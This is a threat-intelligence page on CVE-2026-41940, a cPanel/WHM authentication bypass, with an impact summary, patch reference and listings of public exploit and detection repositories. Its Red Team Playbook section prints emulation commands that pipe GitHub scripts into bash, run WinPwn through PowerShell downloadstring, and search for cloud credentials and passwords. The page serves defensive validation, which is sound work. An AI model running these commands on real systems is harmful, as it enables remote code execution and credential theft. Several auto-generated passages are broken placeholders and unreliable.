CVE-2026-41940
Overview
This vulnerability is an authentication bypass affecting the login flow of cPanel and WHM versions later than 11.40. The root cause lies in improper validation within the authentication mechanism that allows unauthenticated requests to circumvent normal login procedures. The affected component is the control panel's authentication module responsible for user session establishment and access control.
Vulnerability Description
cPanel and WHM versions after 11.40 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized access to the control panel.
Impact
An unauthenticated remote attacker can gain full unauthorized access to the cPanel and WHM control panel, allowing them to manage hosting configurations, access sensitive data, and execute administrative actions. No authentication or user interaction is required to exploit this vulnerability, enabling complete compromise of the affected system. This can lead to data breaches, service disruption, and further lateral movement within the hosting environment.
Solution
Apply the security update released by cPanel on April 28, 2026, which addresses this authentication bypass in cPanel and WHM versions after 11.40. Refer to the official vendor advisory at https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026 for detailed patch instructions. Ensure all affected instances are updated to the fixed versions as specified in the advisory to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The authentication bypass vulnerability present in cPanel and WHM versions after 11.40 is a critical security flaw that compromises the integrity of the login mechanism. This vulnerability allows unauthenticated remote attackers to bypass authentication controls, granting them unauthorized access to the control panel. The underlying issue stems from improper validation of user credentials during the login process, which can be exploited to gain administrative privileges without the need for valid login information. This flaw not only undermines the security of the affected systems but also exposes sensitive data and administrative functionalities to potential malicious actors.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit the flaw. By leveraging automated scripts or manual techniques, an attacker can manipulate the login flow to gain access to the control panel. Once inside, they can perform a range of malicious activities, including altering configurations, accessing sensitive information, or deploying additional malware. The exploitation can occur remotely, meaning that attackers do not need physical access to the affected systems, significantly increasing the risk of widespread attacks. Scenarios may include targeted attacks on web hosting providers or any organization utilizing cPanel and WHM for managing their web services, making it a prime target for cybercriminals.
The real-world impact of this vulnerability is substantial, particularly for businesses that rely on cPanel and WHM for their web hosting operations. Unauthorized access to the control panel can lead to data breaches, loss of customer trust, and potential legal ramifications due to non-compliance with data protection regulations. The financial implications can be severe, as organizations may face costs associated with incident response, remediation, and potential fines. Additionally, the reputational damage from such an incident can have long-lasting effects, as customers may seek alternative hosting solutions if they perceive a lack of security in their current provider.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating cPanel and WHM to the latest versions is crucial, as vendors often release patches to address known vulnerabilities. Additionally, employing intrusion detection systems (IDS) can help identify unauthorized access attempts and alert administrators to suspicious activities. Implementing strong authentication mechanisms, such as two-factor authentication (2FA), can further enhance security by adding an additional layer of verification for users attempting to access the control panel. Regular security audits and penetration testing can also help identify potential weaknesses in the system before they can be exploited.
In conclusion, the authentication bypass vulnerability in cPanel and WHM represents a significant threat to organizations utilizing these platforms for web hosting. The potential for unauthorized access to sensitive administrative functions poses a serious risk to data integrity and business operations. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can take proactive measures to safeguard their systems. Implementing robust detection and mitigation strategies will not only protect against this specific vulnerability but also enhance overall security posture against future threats.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-41940, with a surge in both detection events and the availability of new exploitation tools. Notably, multiple public proof-of-concept exploits have emerged on GitHub, significantly lowering the barrier for threat actors to conduct unauthorized access against vulnerable cPanel and WHM instances. This development coincides with the vulnerability’s addition to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its recognition as an active and critical threat, particularly given documented ransomware group interest. Our telemetry indicates that the EPSS score for this vulnerability has risen sharply, reflecting a high likelihood of exploitation in the wild. The CVSS score adjustment to 9.8 further confirms the critical severity of this authentication bypass flaw. Collectively, these changes elevate the threat level substantially, signaling an urgent need for heightened vigilance as adversaries increasingly weaponize this vulnerability to gain privileged control over web hosting environments.
Update 2 — May 22, 2026
CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2026-41940 with the emergence of a Metasploit module targeting this critical authentication bypass vulnerability. This addition substantially lowers the technical barrier for adversaries, enabling a broader range of threat actors—including less sophisticated attackers—to execute unauthorized access against vulnerable cPanel and WHM instances. Concurrently, our telemetry indicates a discernible uptick in detection activity, corroborating increased exploitation attempts in the wild. The EPSS score’s marked rise to 0.8437, now placing this vulnerability in the 0.99th percentile for exploitation likelihood, underscores the accelerating threat momentum. Given the known association of this vulnerability with ransomware campaigns, these shifts elevate the urgency and severity of the risk posture. Defenders must recognize that the availability of automated exploitation tools and growing exploitation activity significantly amplify the potential for widespread compromise, making CVE-2026-41940 an immediate and high-priority threat within hosting environments.
Update 3 — June 07, 2026
Since the last assessment, the threat landscape for CVE-2026-41940 has evolved with the publication of a new ExploitDB entry, marking the first formal public exploit record for this critical authentication bypass vulnerability. Although our telemetry indicates a significant reduction in detection activity, this decline may reflect a shift in attacker tactics rather than diminished exploitation attempts. Concurrently, the availability of new proof-of-concept exploits on public repositories has expanded, lowering the barrier for adversaries to weaponize this vulnerability. The EPSS score’s further increase to 0.9076, coupled with a steady upward trend, signals sustained and potentially growing exploitation risk. Given the known linkage of this vulnerability to ransomware campaigns, these developments underscore an elevated threat environment where automated and publicly accessible exploitation tools facilitate unauthorized access to cPanel and WHM control panels. Defenders should interpret this as a heightened risk scenario, where the combination of reduced detection signals and expanded exploit availability complicates timely identification and response, thereby increasing the likelihood of successful compromise.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cpanel | Cpanel | All |
cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*
|
|
|
Cpanel | Whm | All |
cpe:2.3:a:cpanel:whm:*:*:*:*:*:*:*:*
|
|
|
Cpanel | Wp Squared | All |
cpe:2.3:a:cpanel:wp_squared:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
cPanel/WHM CRLF Injection Authentication Bypass RCE
exploits/multi/http/cpanel_whm_auth_bypass_rce
|
Sina Kheirkhah, Adam Kues, Shubham Shah +1 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| cPanel - CRLF Injection | nu11secur1ty | webapps | php | - | View |
GitHub PoCs (77)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ynsmroztas/cPanelSniper
CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection
|
ynsmroztas | 459 | 131 | 2026-05-01 | View |
|
olofsatte/CVE-2026-41940-PoC
CVE-2026-41940 is a critical authentication bypass vulnerability affecting cPanel and WHM. This repository is designed t...
|
olofsatte | 202 | 51 | 2026-06-04 | View |
|
assetnote/cpanel2shell-scanner
High fidelity scanner for CVE-2026-41940 (cPanel & WHM authentication bypass)
|
assetnote | 91 | 24 | 2026-04-30 | View |
|
XsanFlip/poc-cpanel-cve-2026-41940
|
XsanFlip | 62 | 11 | 2026-05-01 | View |
|
clsmight/CVE-2026-41940-PoC
CVE-2026-41940 exploitation proof-of-concept project
|
clsmight | 62 | 8 | 2026-06-16 | View |
|
adriyansyah-mf/cve-2026-41940-poc
|
adriyansyah-mf | 28 | 15 | 2026-04-30 | View |
|
Sachinart/CVE-2026-41940-cpanel-0day
CVE-2026-41940 latest cPanel & WHM 0day - 70 million websites are possible to expose by Chirag Artani
|
Sachinart | 26 | 2 | 2026-04-29 | View |
|
ilmndwntr/CVE-2026-41940-MASS-EXPLOIT
CVE-2026-41940 SUPPORT SINGLE & MASS SCAN EXPLOIT
|
ilmndwntr | 13 | 9 | 2026-04-30 | View |
|
realawaisakbar/CVE-2026-41940-Exploit-PoC
This repository contains a Proof-of-Concept (PoC) exploit for CVE-2026-41940, a critical authentication bypass vulnerabi...
|
realawaisakbar | 12 | 7 | 2026-04-30 | View |
|
Kagantua/cPanelWHM-AuthBypass
CVE-2026-41940
|
Kagantua | 9 | 7 | 2026-04-30 | View |
|
bughunt4me/cpanelCVE-2026-41940
CVE-2026-41940 Auto Root Login
|
bughunt4me | 12 | 4 | 2026-05-06 | View |
|
debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker
Post-Exploitation Session Validation Tool for CVE-2026-41940
|
debugactiveprocess | 8 | 7 | 2026-04-29 | View |
|
rfxn/cpanel-sessionscribe
Detection, mitigation, and reverse-engineering tooling for CVE-2026-41940 (SessionScribe): the cPanel/WHM unauthenticate...
|
rfxn | 13 | 1 | 2026-04-30 | View |
|
Christian93111/CVE-2026-41940
cPanel/WHM Authentication Bypass (Zero-Day Vulnerability)
|
Christian93111 | 9 | 2 | 2026-05-01 | View |
|
aquace/CVE-2026-41940-PoC
CVE-2026-41940 authentication bypass vulnerability proof-of-concept
|
aquace | 7 | 2 | 2026-06-28 | View |
|
Jenderal92/CVE-2026-41940
Bulk scanner and mass exploitation tool for CVE-2026-41940 on cPanel/WHM, built for automated target validation and high...
|
Jenderal92 | 4 | 4 | 2026-05-01 | View |
|
senyx122/CVE-2026-41940
A security research tool for detecting and analyzing cPanel/WHM services and their authentication behavior. Designed for...
|
senyx122 | 7 | 0 | 2026-05-01 | View |
|
NULL200OK/cve-2026-41940-tool
A comprehensive Python utility to **detect**, **scan in bulk**, and **exploit** the critical authentication bypass vulne...
|
NULL200OK | 4 | 2 | 2026-05-01 | View |
|
tc4dy/CVE-2026-41940-PoC-Exploit
🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - Best Flow 💥 CRLF injection leads to auth bypass, session hijacking & a...
|
tc4dy | 5 | 0 | 2026-05-12 | View |
|
shahidmallaofficial/cpanel-cve-2026-41940-fix
|
shahidmallaofficial | 5 | 0 | 2026-04-30 | View |
|
habibkaratas/sorry-ransomware-analysis
Sorry ransomware (.sorry) IOCs, YARA rules and forensic analysis - CVE-2026-41940 cPanel campaign
|
habibkaratas | 4 | 0 | 2026-05-04 | View |
|
Andrei-Dr/cpanel-cve-2026-41940-ioc
CVE-2026-41940 cPanel/WHM auth bypass IOC scanner — fixes false positives in upstream detection script, adds log cross-c...
|
Andrei-Dr | 4 | 0 | 2026-04-30 | View |
|
Ishanoshada/CVE-2026-41940-Exploit-PoC
CVE-2026-41940 Exploit PoC – cPanel & WHM Authentication Bypass via CRLF Injection
|
Ishanoshada | 2 | 1 | 2026-05-02 | View |
|
MrAriaNet/cPanel-Fix
One security-remediation.sh for CVE-2026-41940 (cPanel), CVE-2026-31431 (kernel "Copy Fail"), CSF, optional domain/proxy...
|
MrAriaNet | 1 | 2 | 2026-05-01 | View |
|
AmirrezaMarzban/portscan-CVE-2026-41940
IP CIDRs (presumably as input, maybe command line or file) and checks ports 2083 and 2087 for openness
|
AmirrezaMarzban | 1 | 2 | 2026-05-01 | View |
|
kmaruthisrikar/CVE-2026-41940-cPanel-Auth-Bypass-Exploit
|
kmaruthisrikar | 2 | 1 | 2026-05-01 | View |
|
0xabdoulaye/CPANEL-CVE-2026-41940
|
0xabdoulaye | 2 | 1 | 2026-04-30 | View |
|
mahfuzreham/cpanel-cve-2026-41940
cPanel CVE-2026-41940 nuclear.x86 Security Audit & Cleanup Script
|
mahfuzreham | 2 | 1 | 2026-05-01 | View |
|
merdw/cPanel-CVE-2026-41940-Scanner
Advanced cPanel & WHM Security Scanner for CVE-2026-41940. with mass Shodan discovery
|
merdw | 3 | 0 | 2026-05-01 | View |
|
yaunsky/cPanelWHM-AuthBypass
CVE-2026-41940
|
yaunsky | 3 | 0 | 2026-04-30 | View |
|
willygailo/CVE-2026-41940-Linux
⚠️ DISCLAIMER: This tool is intended for authorized penetration testing and educational purposes only. Using this tool a...
|
willygailo | 2 | 0 | 2026-05-27 | View |
|
44pie/cpsniper
cPanelSniper STABLE - CVE-2026-41940 optimized for 10M+ targets
|
44pie | 2 | 0 | 2026-05-10 | View |
|
Defacto-ridgepole254/CVE-2026-41940-Exploit-PoC
Test authentication bypass vulnerabilities in cPanel and WHM using this proof of concept exploit tool written in Go.
|
Defacto-ridgepole254 | 1 | 1 | 2026-05-06 | View |
|
murrez/CVE-2026-41940
PoC for CVE-2026-41940: WHM/cPanel authentication bypass chain (Python 2.7). For authorized security research and testin...
|
murrez | 1 | 1 | 2026-05-06 | View |
|
MrOplus/CVE-2026-41940
CVE-2026-41940 Direct Shell Acess
|
MrOplus | 1 | 1 | 2026-05-02 | View |
|
Lutfifakee-Project/CVE-2026-41940
cPanel/WHM CVE-2026-41940 - Mass Scanner & Exploiter
|
Lutfifakee-Project | 2 | 0 | 2026-05-01 | View |
|
Wesuiliye/CVE-2026-41940
CVE-2026-41940利用工具(go并发检测,python利用)
|
Wesuiliye | 1 | 1 | 2026-04-30 | View |
|
Ap0dexMe0/CVE-2026-41940
cPanel & Whm Authentication Bypasser
|
Ap0dexMe0 | 2 | 0 | 2026-05-02 | View |
|
unteikyou/CVE-2026-41940-AuthBypass-Detector
Detection tool for cPanel/WHM CVE-2026-41940 (CRLF injection auth bypass). Verify vulnerability on servers you own or ha...
|
unteikyou | 2 | 0 | 2026-05-01 | View |
|
george1-adel/CVE-2026-41940_exploit
|
george1-adel | 2 | 0 | 2026-05-01 | View |
|
zedxod/CVE-2026-41940-POC
|
zedxod | 2 | 0 | 2026-04-30 | View |
|
sardine-web/Automated-scanner-CVE-2026-41940
Automated scanner & post-exploitation toolkit for CVE-2026-41940 — cPanel & WHM root authentication bypass via session-f...
|
sardine-web | 1 | 0 | 2026-05-24 | View |
|
Unleasheddotc/cve-2026-41940-exploit
improved poc of cve-2026-41940
|
Unleasheddotc | 1 | 0 | 2026-05-01 | View |
|
tc4dy/CVE-2026-41940-POC-Exploit
🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - Best Flow 💥 CRLF injection leads to auth bypass, session hijacking & a...
|
tc4dy | 1 | 0 | 2026-05-12 | View |
|
thekawix/CVE-2026-41940
cve-2026-41940 cPanel/WHM Authentication Bypass - Detection Artifact Generator
|
thekawix | 1 | 0 | 2026-05-07 | View |
|
Richflexpix/cpanel-pwn
cPanel/WHM CVE-2026-41940 CRLF injection auth bypass exploit
|
Richflexpix | 0 | 1 | 2026-05-05 | View |
|
0xBlackash/CVE-2026-41940
CVE-2026-41940
|
0xBlackash | 0 | 1 | 2026-05-01 | View |
|
Unfold-Security/CVE-2026-41940-Detection
Detection signatures for CVE-2026-41940 and shemas for cPanel logs
|
Unfold-Security | 1 | 0 | 2026-05-05 | View |
|
nickpaulsec/2026-41940-poc
CVE-2026-41940: detect and exploit cpanel vuln
|
nickpaulsec | 1 | 0 | 2026-05-04 | View |
|
cy3erm/CVE-2026-41940-POC
cPanel/WHM Authentication Bypass Proof of Concept — CVE-2026-41940
|
cy3erm | 1 | 0 | 2026-05-03 | View |
|
linko-iheb/cve-2026-41940-scanner
|
linko-iheb | 1 | 0 | 2026-05-02 | View |
|
0xF55/cve-2026-41940-exploit
improved poc of cve-2026-41940
|
0xF55 | 1 | 0 | 2026-05-01 | View |
|
0dev1337/cpanelscanner
Cpanel Scanner For CVE-2026-41940
|
0dev1337 | 1 | 0 | 2026-05-01 | View |
|
limo57640-crypto/cpanel-cve-41940-detector
Read-only cPanel CVE-2026-41940 IOC detector for .sorry ransomware, Mr_Rot13 Filemanager backdoors, C2 callbacks, cron, ...
|
limo57640-crypto | 0 | 0 | 2026-05-16 | View |
|
asdasddqwdq29-a11y/CVE-2026-41940
Redacted cPanel/WHM authentication bypass analysis and authorized checker
|
asdasddqwdq29-a11y | 0 | 0 | 2026-06-06 | View |
|
yurahshell/CVE-2026-41940
|
yurahshell | 0 | 0 | 2026-06-05 | View |
|
zwanski2019/cPanelSniper
CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection
|
zwanski2019 | 0 | 0 | 2026-05-04 | View |
|
xxconi/CVE-2026-41940
Private exploit
|
xxconi | 0 | 0 | 2026-05-23 | View |
|
zycoder0day/CVE-2026-41940
|
zycoder0day | 0 | 0 | 2026-05-11 | View |
|
anach-ai/CVE-2026-41940
CVE-2026-41940 — cPanel/WHM Auth Bypass By Dr.Anach, CRLF injection in `cpsrvd` Basic auth handler → unauthenticated WHM...
|
anach-ai | 0 | 0 | 2026-05-11 | View |
|
ngksiva/cpanel-forensics
Форензика после CVE-2026-41940 (cPanel/WHM) — bash-скрипт и чек-лист
|
ngksiva | 0 | 0 | 2026-05-10 | View |
|
SreejaPuthan/cpanel-control-plane-exposure-check
Defensive exposure assessment tool for identifying externally accessible cPanel, WHM, and Webmail management interfaces ...
|
SreejaPuthan | 0 | 0 | 2026-05-09 | View |
|
acuciureanu/cpanel2shell-honeypot
A Rust honeypot that simulates a vulnerable cPanel/WHM instance for CVE-2026-41940
|
acuciureanu | 0 | 0 | 2026-05-08 | View |
|
branixsolutions/Security-CVE-2026-41940-cPanel-WHM-WP2
|
branixsolutions | 0 | 0 | 2026-05-08 | View |
|
OhmGun/whmxploit---CVE-2026-41940
CVE-2026-41940
|
OhmGun | 0 | 0 | 2026-05-06 | View |
|
itsismarcos/CVE-2026-41940
Exploit CVE-2026-41940 auto exploit
|
itsismarcos | 0 | 0 | 2026-05-04 | View |
|
iSee857/cPanel-WHM-CVE-2026-41940-AuthBypass
cPanel-WHM-CVE-2026-41940-AuthBypass
|
iSee857 | 0 | 0 | 2026-05-04 | View |
|
sercanokur/CVE-2026-41940-cPanel-WHM-Verification-Tool
This repository contains a Python verification script for `CVE-2026-41940`, a critical authentication bypass vulnerabili...
|
sercanokur | 0 | 0 | 2026-05-04 | View |
|
Underh0st/CPanel-Audit-Remediation-Tool
Audit and incident response tool for CVE-2026-41940 vulnerability
|
Underh0st | 0 | 0 | 2026-05-03 | View |
|
tfawnies/CVE-2026-41940-next
|
tfawnies | 0 | 0 | 2026-05-03 | View |
|
imbas007/POC_CVE-2026-41940
|
imbas007 | 0 | 0 | 2026-05-03 | View |
|
3tternp/CVE-2026-41940---cPanel-WHM-check
This is the office check script provided by cPanel for all the users who are using cPanel
|
3tternp | 0 | 0 | 2026-05-02 | View |
|
dennisec/CVE-2026-41940
CVE-2026-41940
|
dennisec | 0 | 0 | 2026-05-02 | View |
|
vineet7800/cpanel-malware-cleaner-cve-2026
cPanel malware, CVE-2026-41940, virus removal
|
vineet7800 | 0 | 0 | 2026-05-01 | View |
|
devtint/CVE-2026-41940
https://devtint.github.io/CVE-2026-41940
|
devtint | 0 | 0 | 2026-05-01 | View |
|
rdyprtmx/poc-cve-2026-41940
|
rdyprtmx | 0 | 0 | 2026-04-30 | View |
|
ZildanZ/CVE-2026-41940
|
ZildanZ | 0 | 0 | 2026-05-05 | View |
Threat Feed
34 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Active exploitation confirmed — vendor: WebPros, product: cPanel & WHM and WP2 (WordPress Squared)
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.